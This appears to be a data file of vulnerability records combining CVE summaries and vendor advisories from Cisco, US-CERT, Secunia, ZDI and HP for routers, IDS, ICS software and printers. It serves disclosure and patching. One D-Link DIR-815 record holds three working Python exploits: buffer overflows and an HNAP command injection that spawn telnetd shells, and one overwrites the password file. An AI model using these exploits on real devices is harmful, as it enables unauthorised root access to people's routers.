entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ \| Revision \| \| Initial \| \| 1.0 \| 2011-September-14 \| public \| \| \| \| release \| +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-200702-0378	Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201011-0225	Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-201112-0297	Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201507-0645	D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import urllib import urllib2 # This exploits the auth_main.cgi with read buffer overflow exploit for v2.02 # prequisite is just to have id and password fields in params url = 'http://192.168.0.1/authentication.cgi' junk = "A"1004+"B"37+"\x58\xf8\x40\x00" # address of system function in executable junk+="X"164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA" values = "id=test&password=test&test="+junk req = urllib2.Request(url, values) response = urllib2.urlopen(req) the_page = response.read() ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct # format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address) buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"286 buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0) buf+= "B"20+"ZZZZ"+"telnetd -p 6778"+"C"5 # adjustment to get to the right payload buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Command injection in ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CSRF or any other trickery, but probably only works when connected to network I suppose buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.1", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
var-201803-1810	A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts will likely cause a denial-of-service condition. Versions prior to DOPSoft 4.00.04 are vulnerable
var-201809-0087	WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-200607-0396	Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe). Used in the following products eIQnetworks Enterprise Security Analyzer (ESA) Is Syslog daemon (syslogserver.exe) A stack-based buffer overflow vulnerability exists due to a flaw in handling. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-level security management platform. The following commands are known to be affected by this vulnerability: DELTAINTERVAL LOGFOLDER DELETELOGS FWASERVER SYSLOGPUBLICIP GETFWAIMPORTLOG GETFWADELTA DELETERDEPDEVICE COMPRESSRAWLOGFILE GETSYSLOGFIREWALLS ADDPOLICY EDITPOLICY. TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities http://www.zerodayinitiative.com/advisories/TSRT-06-03.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4319. Authentication is not required to exploit this vulnerability. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/ EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor 2006.07.24 - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201702-0423	An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of data from a LAD file. A crafted length element can trigger an overflow of a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-202305-1588	D-Link DIR-2150 SetNTPServerSettings Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20553. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-201112-0173	The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. HP Printers and Digital Senders are prone to a security-bypass vulnerability. An attacker may leverage the issue to remotely install malicious printer firmware. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU 